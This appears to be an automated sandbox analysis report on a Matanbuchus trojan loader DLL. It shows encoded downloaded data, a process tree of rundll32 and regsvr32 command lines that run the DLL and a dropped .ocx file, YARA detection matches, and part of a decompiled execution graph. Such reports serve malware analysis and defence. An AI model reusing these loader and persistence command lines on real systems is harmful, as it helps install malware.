                2024-09-28 01:23:15 UTC16384INData Raw: 59 46 76 54 6e 52 5a 41 4a 61 47 75 51 76 32 55 69 6c 56 35 41 2b 6d 34 43 6a 31 73 33 72 48 0d 0a 49 65 58 67 41 73 57 79 64 6a 41 6b 63 4a 59 6f 67 6d 64 72 5a 54 58 54 62 49 6b 78 67 57 74 48 65 54 4c 45 66 34 6e 78 48 4a 39 56 30 44 36 58 73 4f 6f 65 45 66 38 63 6c 38 53 35 4e 73 64 33 0d 0a 36 63 42 56 62 56 70 6d 41 4c 54 4b 73 79 37 32 64 77 6c 76 7a 69 79 47 78 58 2f 6c 38 6b 44 6b 44 39 62 67 49 49 57 34 55 30 38 42 55 4b 77 43 72 54 4e 4f 4d 6c 47 53 56 71 6f 66 73 6d 74 6c 0d 0a 4e 54 6a 68 41 36 44 52 4a 72 5a 32 68 42 76 44 31 4b 73 6b 65 6a 4a 6e 65 57 55 31 55 46 76 5a 66 55 6b 44 37 38 6f 37 58 74 71 34 68 46 64 74 32 61 4a 6e 37 6e 6a 45 36 49 39 77 30 43 62 72 0d 0a 77 7a 5a 4f 4d 6c 45 53 6b 35 4c 52 4b 38 64 6d 64 44 7a 69 43 39 7a 53
                Data Ascii: YFvTnRZAJaGuQv2UilV5A+m4Cj1s3rHIeXgAsWydjAkcJYogmdrZTXTbIkxgWtHeTLEf4nxHJ9V0D6XsOoeEf8cl8S5Nsd36cBVbVpmALTKsy72dwlvziyGxX/l8kDkD9bgIIW4U08BUKwCrTNOMlGSVqofsmtlNTjhA6DRJrZ2hBvD1KskejJneWU1UFvZfUkD78o7Xtq4hFdt2aJn7njE6I9w0CbrwzZOMlESk5LRK8dmdDziC9zS
                2024-09-28 01:23:15 UTC16384INData Raw: 4a 6d 55 6f 33 44 45 66 4d 55 35 71 65 69 47 0d 0a 4f 62 6c 66 75 38 51 74 72 4a 4b 6c 37 53 70 68 76 4c 30 7a 73 34 75 6d 34 41 35 78 75 38 4e 75 72 49 61 75 34 4d 38 79 6c 70 72 4b 73 66 34 61 69 71 61 55 7a 50 78 71 73 4d 32 75 4b 64 72 67 0d 0a 44 70 69 55 6d 6d 52 53 44 73 50 68 66 5a 4b 34 68 6d 43 6d 72 77 70 37 55 65 36 65 64 75 4c 67 5a 63 61 55 73 66 2f 63 4f 37 6d 47 7a 63 65 33 46 59 65 75 6b 70 77 6a 6c 33 32 34 74 66 4f 30 0d 0a 69 36 59 36 7a 44 54 43 7a 66 4e 68 6b 55 4d 53 58 6d 62 69 34 48 6e 47 6c 4c 48 2f 7a 43 65 35 68 73 33 48 70 78 47 48 72 70 4b 63 49 35 64 38 76 6e 32 62 7a 62 51 5a 34 45 2f 77 76 37 72 4f 0d 0a 72 6f 62 61 50 56 37 76 2f 70 33 4a 78 35 54 46 4e 46 48 69 77 6f 58 4f 73 63 33 63 39 4b 57 52 70 5a 6e 69 36 48 33 47
                Data Ascii: JmUo3DEfMU5qeiGOblfu8QtrJKl7SphvL0zs4um4A5xu8NurIau4M8ylprKsf4aiqaUzPxqsM2uKdrgDpiUmmRSDsPhfZK4hmCmrwp7Ue6eduLgZcaUsf/cO7mGzce3FYeukpwjl324tfO0i6Y6zDTCzfNhkUMSXmbi4HnGlLH/zCe5hs3HpxGHrpKcI5d8vn2bzbQZ4E/wv7rOrobaPV7v/p3Jx5TFNFHiwoXOsc3c9KWRpZni6H3G
                2024-09-28 01:23:15 UTC16384INData Raw: 0a 42 50 4b 39 37 72 5a 79 34 69 6a 4a 73 79 36 79 2f 52 79 66 7a 44 54 47 78 33 2b 70 38 67 53 56 6e 57 52 72 5a 54 55 34 34 41 75 4d 6e 69 74 44 65 54 4a 4f 4d 74 6f 30 58 65 51 58 6c 75 41 77 0d 0a 50 62 45 2b 6f 76 38 63 6d 78 66 79 66 36 4a 6a 32 6a 53 74 68 66 61 45 6c 5a 71 2b 66 5a 66 46 6b 51 53 70 54 33 6e 2b 67 76 34 45 38 72 33 75 74 6e 72 69 4b 4d 47 7a 4c 72 72 39 48 49 50 4b 0d 0a 4e 4d 33 48 66 37 33 79 42 49 46 56 30 47 6e 74 63 4d 44 67 41 35 7a 51 4a 71 50 79 5a 36 71 37 42 49 6e 61 4b 4b 71 68 61 32 55 31 4f 47 76 46 4f 61 6d 73 42 6e 30 79 54 6a 4a 52 38 68 79 5a 0d 0a 73 6f 33 48 5a 44 57 7a 4c 72 72 2f 76 44 61 45 74 66 36 43 2f 67 54 79 76 65 36 32 65 75 49 6f 77 66 38 75 6f 6e 52 5a 61 30 66 79 64 30 5a 69 33 44 53 31 50 4c 4a 56
                Data Ascii: BPK97rZy4ijJsy6y/RyfzDTGx3+p8gSVnWRrZTU44AuMnitDeTJOMto0XeQXluAwPbE+ov8cmxfyf6Jj2jSthfaElZq+fZfFkQSpT3n+gv4E8r3utnriKMGzLrr9HIPKNM3Hf73yBIFV0GntcMDgA5zQJqPyZ6q7BInaKKqha2U1OGvFOamsBn0yTjJR8hyZso3HZDWzLrr/vDaEtf6C/gTyve62euIowf8uonRZa0fyd0Zi3DS1PLJV
                2024-09-28 01:23:15 UTC16384INData Raw: 48 65 62 67 4c 6a 72 6a 69 55 57 31 61 6a 2f 39 6c 4e 54 6a 72 4d 34 64 66 48 67 4c 35 54 37 77 33 4a 45 62 61 49 46 4c 74 50 6d 6d 38 64 64 50 48 0d 0a 49 65 33 67 41 73 47 35 41 34 62 61 4b 56 6c 57 43 32 34 65 63 72 35 39 30 38 55 35 37 65 41 58 64 51 6b 66 50 69 52 77 6c 69 6a 71 5a 32 74 6c 4e 64 4e 73 69 54 48 70 61 30 64 35 4d 73 52 33 0d 0a 34 5a 49 63 68 68 50 6d 46 70 59 77 54 53 6a 4f 43 61 74 74 4d 6b 53 35 43 7a 72 61 4e 46 33 6b 48 38 72 69 4b 4a 32 7a 50 75 4c 2f 48 4d 50 4d 4d 7a 70 31 65 6c 6b 4d 52 75 59 50 79 75 41 67 0d 0a 6e 62 4d 68 51 6b 38 52 5a 7a 4a 77 39 51 75 57 55 48 6c 52 62 62 46 68 72 43 43 52 4f 47 74 4f 64 4e 4d 75 34 35 49 77 66 50 4c 61 4e 4b 55 4a 30 32 74 72 5a 54 55 34 34 4b 73 70 6d 67 33 58 0d 0a 73 5a 42 50 49 76
                Data Ascii: HebgLjrjiUW1aj/9lNTjrM4dfHgL5T7w3JEbaIFLtPmm8ddPHIe3gAsG5A4baKVlWC24ecr5908U57eAXdQkfPiRwlijqZ2tlNdNsiTHpa0d5MsR34ZIchhPmFpYwTSjOCattMkS5CzraNF3kH8riKJ2zPuL/HMPMMzp1elkMRuYPyuAgnbMhQk8RZzJw9QuWUHlRbbFhrCCROGtOdNMu45IwfPLaNKUJ02trZTU44Kspmg3XsZBPIv


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:21:21:57
                Start date:27/09/2024
                Path:C:\Windows\System32\loaddll32.exe
                Wow64 process (32bit):true
                Commandline:loaddll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll"
                Imagebase:0x530000
                File size:126'464 bytes
                MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:1
                Start time:21:21:57
                Start date:27/09/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:21:21:57
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
                Imagebase:0x410000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:21:21:57
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:21:21:57
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:12
                Start time:21:22:00
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInitialize
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:13
                Start time:21:22:03
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInstall
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                Target ID:16
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInit
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:17
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInitialize
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:18
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInstall
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.1539682378.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:true

                Target ID:19
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_setopt
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:20
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_perform
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:21
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_init
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:22
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_cleanup
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000016.00000002.1663869871.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                Has exited:true

                Target ID:23
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",_Uninitialize
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:24
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",UnregisterDll
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:25
                Start time:21:22:06
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Uninitialize
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:27
                Start time:21:22:07
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ThreadFunction
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:28
                Start time:21:22:07
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Main
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:29
                Start time:21:22:07
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Init
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:30
                Start time:21:22:07
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ExportDll
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:31
                Start time:21:22:07
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Export
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:32
                Start time:21:22:07
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllUninitialize
                Imagebase:0x270000
                File size:61'440 bytes
                MD5 hash:889B99C52A60DD49227C5E485A016679
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:34
                Start time:21:22:08
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 612
                Imagebase:0x5d0000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:35
                Start time:21:22:08
                Start date:27/09/2024
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                Imagebase:0x7ff6a6fa0000
                File size:25'088 bytes
                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:36
                Start time:21:22:10
                Start date:27/09/2024
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                Imagebase:0xb00000
                File size:20'992 bytes
                MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000024.00000002.1655827113.000000006B4A1000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                Has exited:true

                Target ID:40
                Start time:23:04:54
                Start date:27/09/2024
                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                Imagebase:0x7ff65d160000
                File size:468'120 bytes
                MD5 hash:B3676839B2EE96983F9ED735CD044159
                Has elevated privileges:true
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:41
                Start time:23:04:54
                Start date:27/09/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:42
                Start time:23:05:07
                Start date:27/09/2024
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                Imagebase:0x7ff6a6fa0000
                File size:25'088 bytes
                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Has exited:true

                Reset < >

                  Execution Graph

                  Execution Coverage:7%
                  Dynamic/Decrypted Code Coverage:99.1%
                  Signature Coverage:51.3%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:11
                  execution_graph 45386 7edb955a 45387 7edb9574 45386->45387 45420 7ee01268 45387->45420 45389 7edb958b 45423 7edf00c0 45389->45423 45397 7edb9696 45506 7ede3180 45397->45506 45401 7eda6300 std::ios_base::clear 28 API calls 45402 7edb9a0f 45401->45402 45404 7eda6300 std::ios_base::clear 28 API calls 45402->45404 45403 7edb96cc swprintf 45512 7eda6300 45403->45512 45405 7edb9a30 45404->45405 45406 7eda6300 std::ios_base::clear 28 API calls 45405->45406 45407 7edb9a51 45406->45407 45516 7ede9e70 45407->45516 45410 7eda6300 std::ios_base::clear 28 API calls 45411 7edb9a88 45410->45411 45412 7eda6300 std::ios_base::clear 28 API calls 45411->45412 45413 7edb9aa9 45412->45413 45635 7eddc4f0 45413->45635 45415 7edb9c70 IsValidCodePage 45416 7edb9c8e lstrlenA 45415->45416 45417 7edb9d86 GetWindowTextLengthA 45416->45417 45419 7edb9dc5 45417->45419 45418 7edb9ab6 swprintf 45418->45415 45859 7ee01a50 GetPEB 45420->45859 45422 7ee01273 45422->45389 45424 7edf00f5 45423->45424 45861 7ed95330 45424->45861 45426 7edf0147 45867 7eda7660 45426->45867 45428 7edf017f 45870 7edae3e0 45428->45870 45430 7edf01a5 45431 7ed95330 numpunct 28 API calls 45430->45431 45432 7edf0224 45431->45432 45432->45432 45433 7ed95330 numpunct 28 API calls 45432->45433 45434 7edf028e 45433->45434 45434->45434 45435 7ed95330 numpunct 28 API calls 45434->45435 45436 7edf0303 45435->45436 45437 7ed95330 numpunct 28 API calls 45436->45437 45438 7edf037d 45437->45438 45439 7eda75e0 28 API calls 45438->45439 45440 7edf039d 45439->45440 45441 7eda75e0 28 API calls 45440->45441 45442 7edf03b8 45441->45442 45443 7eda6300 std::ios_base::clear 28 API calls 45442->45443 45444 7edf03e0 45443->45444 45445 7eda6300 std::ios_base::clear 28 API calls 45444->45445 45446 7edf0401 45445->45446 45447 7eda6300 std::ios_base::clear 28 API calls 45446->45447 45448 7edf0422 45447->45448 45449 7eda6300 std::ios_base::clear 28 API calls 45448->45449 45450 7edf0443 45449->45450 45874 7eda7dc0 45450->45874 45454 7edf046d 45916 7edc5c10 45454->45916 45456 7edf047c 45457 7edc5c10 std::ios_base::clear 26 API calls 45456->45457 45458 7edf048b 45457->45458 45459 7edc5c10 std::ios_base::clear 26 API calls 45458->45459 45460 7edf049a 45459->45460 45461 7edc5c10 std::ios_base::clear 26 API calls 45460->45461 45462 7edf04a9 45461->45462 45463 7edc5850 26 API calls 45462->45463 45464 7edb9657 45463->45464 45465 7eda75e0 45464->45465 46030 7ed959f0 45465->46030 45468 7eda83e0 45469 7eda8418 45468->45469 46048 7edc2420 45469->46048 45472 7eda75e0 28 API calls 45473 7eda857e 45472->45473 46051 7edebd70 45473->46051 45487 7eda85ba 46157 7ede8930 45487->46157 45491 7eda85ca 46173 7edec060 GetPEB 45491->46173 45498 7edc5850 26 API calls 45499 7eda85ee 45498->45499 45500 7edc5850 26 API calls 45499->45500 45501 7eda85fd 45500->45501 45502 7ede18d0 lstrlenA 45501->45502 45504 7ede1b19 swprintf 45502->45504 45503 7ede1edf IsWow64Message 45505 7ede1efd swprintf 45503->45505 45504->45503 45505->45397 45507 7ede3389 swprintf 45506->45507 45509 7ede363d swprintf 45507->45509 46367 7ede60e0 5 API calls swprintf 45507->46367 45510 7ede18d0 2 API calls 45509->45510 45511 7ede3dbc swprintf 45510->45511 45511->45403 45513 7eda637c 45512->45513 46368 7ed95460 45513->46368 45515 7eda63c1 45515->45401 46376 7ed93130 45516->46376 45519 7ed93130 49 API calls 45520 7ede9ee2 45519->45520 46381 7eda5eb0 45520->46381 45523 7ed93130 49 API calls 45524 7ede9f73 45523->45524 46402 7ed93190 45524->46402 45527 7eda5eb0 49 API calls 45528 7edea003 45527->45528 45529 7ed93130 49 API calls 45528->45529 45530 7edea030 45529->45530 45531 7ed93190 49 API calls 45530->45531 45532 7edea05c 45531->45532 45533 7eda5eb0 49 API calls 45532->45533 45534 7edea0c0 45533->45534 45535 7ed93130 49 API calls 45534->45535 45536 7edea0ed 45535->45536 45537 7ed93190 49 API calls 45536->45537 45538 7edea119 45537->45538 45539 7eda5eb0 49 API calls 45538->45539 45540 7edea17d 45539->45540 45541 7ed93130 49 API calls 45540->45541 45542 7edea1aa 45541->45542 45543 7ed93190 49 API calls 45542->45543 45544 7edea1d6 45543->45544 45545 7eda5eb0 49 API calls 45544->45545 45546 7edea23a 45545->45546 45547 7ed93130 49 API calls 45546->45547 45548 7edea267 45547->45548 45549 7ed93190 49 API calls 45548->45549 45550 7edea296 45549->45550 45551 7eda5eb0 49 API calls 45550->45551 45552 7edea2fa 45551->45552 45553 7ed93130 49 API calls 45552->45553 45554 7edea327 45553->45554 45555 7ed93190 49 API calls 45554->45555 45556 7edea356 45555->45556 45557 7eda5eb0 49 API calls 45556->45557 45558 7edea3ba 45557->45558 45559 7ed93130 49 API calls 45558->45559 45560 7edea3e7 45559->45560 45561 7ed93190 49 API calls 45560->45561 45562 7edea416 45561->45562 45563 7eda5eb0 49 API calls 45562->45563 45564 7edea47a 45563->45564 45565 7ed93130 49 API calls 45564->45565 45566 7edea4a7 45565->45566 45567 7ed93190 49 API calls 45566->45567 45568 7edea4d6 45567->45568 45569 7eda5eb0 49 API calls 45568->45569 45570 7edea53a 45569->45570 45571 7ed93130 49 API calls 45570->45571 45572 7edea567 45571->45572 45573 7ed93190 49 API calls 45572->45573 45574 7edea596 45573->45574 45575 7eda5eb0 49 API calls 45574->45575 45576 7edea5fa 45575->45576 45577 7ed93130 49 API calls 45576->45577 45578 7edea627 45577->45578 45579 7ed93190 49 API calls 45578->45579 45580 7edea659 45579->45580 45581 7eda5eb0 49 API calls 45580->45581 45582 7edea6bd 45581->45582 45583 7ed93130 49 API calls 45582->45583 45584 7edea6ea 45583->45584 46407 7ed995e0 45584->46407 45589 7eda5eb0 49 API calls 45590 7edea7af 45589->45590 45591 7ed93130 49 API calls 45590->45591 45592 7edea7dc 45591->45592 